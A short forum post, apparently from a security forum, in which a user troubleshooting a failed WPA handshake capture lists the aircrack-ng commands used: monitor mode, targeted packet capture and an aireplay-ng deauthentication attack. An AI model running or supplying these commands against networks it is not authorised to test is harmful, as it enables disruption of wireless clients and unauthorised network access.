Jump to content

Crack-ng Handshake


Strigoi

Recommended Posts

The steps I performed. I think I might just be too far away. The deauth attack is registering 0/66 packets acknowledged.

 

1) airmon-ng start wlan0mon

2) airodump-ng wlan0mon

3)  airodump-ng -c 1 --bssid attack-mac -w filepsk wlan0mon

4)  aireplay-ng -0 1 -a WAP_MAC -c CLIENT_MAC wlan0mon --ignore-negative-one

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...